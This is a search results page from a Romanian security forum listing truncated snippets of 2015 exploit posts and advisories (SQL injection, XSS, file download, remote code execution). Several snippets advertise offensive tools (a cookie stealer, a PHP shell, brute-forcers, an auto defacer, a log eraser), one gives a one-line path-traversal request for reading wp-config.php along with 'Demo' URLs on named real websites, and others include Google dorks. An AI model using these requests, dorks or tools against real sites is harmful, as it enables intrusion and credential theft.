Jump to content

Search the Community

Showing results for tags '[+]'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 18 results

  1. TCPDF library Universal POI Payload to Arbitrary File Deletion [+] Author: Filippo Roncari [+] Target: TCPDF library [+] Version: <= 5.9 and probably others [tested on v5.9] [+] Vendor: http://www.tcpdf.org [+] Accessibility: Remote [+] Severity: High [+] CVE: n/a [+] Advisory URL: n/a [+] Contacts: f.roncari@securenetwork.it / f@unsec.it [+] Summary TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerabl
  2. eFront 3.6.15 Multiple SQL Injection Vulnerabilities [+] Author: Filippo Roncari | Luca De Fulgentis [+] Target: eFront [+] Version: 3.6.15 and probably lower [+] Vendor: www.efrontlearning.net [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf [+] Info: f.roncari@securenetwork.it [+] Summary eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning commun
  3. Document Title: =============== Fortinet FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1354 Security Bulletin FortiGuard: http://www.fortiguard.com/advisory/FG-IR-15-005/ PSIRT ID: 1327458 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3620 CVE-ID: ======= CVE-2015-3620 Release Date: ============= 2015-05-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1354 Common Vulnerability Scoring System: =====================
  4. Cookies Manager Author: Doddy Hackman A simple program in PHP to help with XSS vulnerability in this program are the following: [+] Cookie Stealer with TinyURL Generator [+] Can you see the cookies that brings back a page [+] Can create cookies with information they want [+] Hidden to login to enter Panel use ?poraca to find the login A video with examples of use: Download Source: https://github.com/DoddyHackman/Cookies_Manager
  5. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |---------------------------------------
  6. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Date : 2015-03-28 | [+] Discovered By : ACC3SS |-----------------------------
  7. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-cloud-ebook-generator/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |------------------------
  8. ###################################################################### [+] Title: Script Question2Answer 1.7 - Stored XSS Vulnerability [+] Author: s0w [+] Tested On Windows & Linux [+] Date: 21/03/2015 [+] Type: Web Application [+] Script Download: https://github.com/q2a/question2answer [+] Vendor Homepage: Question2Answer - Free Open Source Q&A Software for PHP [+] Vulnerability in:\qa-include\pages\question.php [+] Google Dork : intext:"Powered by Question2Answer" ####################################################################### [+] As shown in the code, the value of 'title' a
  9. ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.t
  10. ################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ####################################################################################################
  11. # Exploit Title: Wordpress Media Cleaner - XSS # Author: ?smail SAYGILI # Web Site: www.ismailsaygili.com.tr # E-Mail: iletisim@ismailsaygili.com.tr # Date: 2015-02-26 # Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip # Version: 2.2.6 # Vulnerable File(s): [+] wp-media-cleaner.php # Vulnerable Code(s): [+] 647. Line $view = $_GET['view'] : "issues"; [+] 648. Line $paged = $_GET['paged'] : 1; [+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null; # Request Method(s):
  12. [+] AnonGhost Auto SQLi Query Maker [+] https://ghostbin.com/paste/hd26gkco [+] Facebook XMPP Chat Protocol Bruteforce [+] https://ghostbin.com/paste/oynf9bt2 [+] Facebook Brute Reset Codel [+] https://ghostbin.com/paste/e5te5umj [+] Ftp Brute Force [+] https://ghostbin.com/paste/3sxovcuh/edit [+] Facebook Pentester [+] https://ghostbin.com/paste/qyns3ox7 [+] Twitter Brute Force [+] https://ghostbin.com/paste/nubyt3vh Password = ./d3f4ult_v1rUsa
  13. [+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Brutefo
  14. Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: =============
  15. [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut2
  16. Document Title: =============== LizardSquad DDoS Stresser - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1417 http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos# Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1417 Common Vulnerability Scoring System: ==================================== 8.9 Product & Service Introduction: =============================== The pr
  17. [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : Invem CMS SQL INJECTION Vulnerability [+] [+]Exploit Author : Ashiyane Digital Security Team [+] [+]Vendor Homepage: http://www.invem.com/
  18. Document Title: =============== Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1409 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1409 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== Remote Web Desktop enable you remotely manage & control your Android device from the computer web browser over wireless connection. (
×
×
  • Create New...